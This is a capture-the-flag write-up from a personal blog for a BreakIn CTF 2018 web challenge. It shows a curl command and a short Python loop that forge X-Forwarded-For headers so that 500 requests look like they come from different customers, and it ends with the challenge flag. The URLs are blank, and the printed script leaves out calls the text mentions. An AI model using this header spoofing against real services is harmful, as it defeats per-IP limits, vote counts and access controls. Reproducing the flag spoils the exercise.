Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
BreakIn CTF 2018 - Aalekh and his Business - Web - 500
Posted: 23 Jan 2018 at 10:22 by Codehead


Aalekh joined IIIT in 2014. Soon, he started selling T-shirts and hoodies. One day, Aalekh got a big order and trusted his childhood friend to handle the order. But his friend betrayed him and sold bad pieces. College students got angry and tried to beat Aalekh up. His good friend, Anshul, wanted to save him. To prevent Aalekh from going under loss, he has to sell 500 T-shirts on the market, the only condition being, customers have to be unique.

Can you help Anshul sell 500 T-shirts?

Flag Format: BREAKIN{[0-9A-Za-z_]+}


Visiting the URL in the challenge created a UID and generated the following URL:

Visiting this URL told me I had sold my first T-shirt.

Please hit from different ip. 499 left

Refreshing the page did nothing, I needed to appear as another customer (I.e. have a different IP address) to sell another shirt.

I didn’t feel like rebooting my router to pick up a new IP from my ISP, so I used curl to set an X-Forwarded-For header. This simulates a proxy forwarding another machine’s traffic and we can control the address that is passed to the target.

$ curl --header "X-Forwarded-For:" ""
Woah! New hit. Go ahead only 498 left

That works great, but 498 more hits is too much to type, we need to script up a solution.

Using Python, we can easily set up a request with the required headers and generate a whole bunch of unique IPs to cycle through to sell those remaining 498 T-Shirts.

import requests
import sys
import time

for x in range(1,5):
	for y in range(1,254):
		hd = {'X-Forwarded-For': '10.1.' + str(x) + '.' + str(y)}
		response = requests.get('', headers=hd)

The flush() call is there because I don’t always see the output on long running scripts. flush() forces the console to update.

I put a sleep() call in so that I wouldn’t hammer the server too much. It seemed to be quite slow and I didn’t want to make that any worse. However, the UID only appeared to stay valid for a few minutes and I had to start again with a new UID and remove the delay to fit 500 requests in before the timeout.

With a fresh UID and no delay, the script ran flawlessly.

Woah! New hit. Go ahead only 497 left
Woah! New hit. Go ahead only 496 left
Woah! New hit. Go ahead only 2 left
Woah! New hit. Go ahead only 1 left
Woah! Do did it. Flag is BREAKIN{dhandhesebadhakoidharmnhihota}


Categories: Hacking CTF

Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead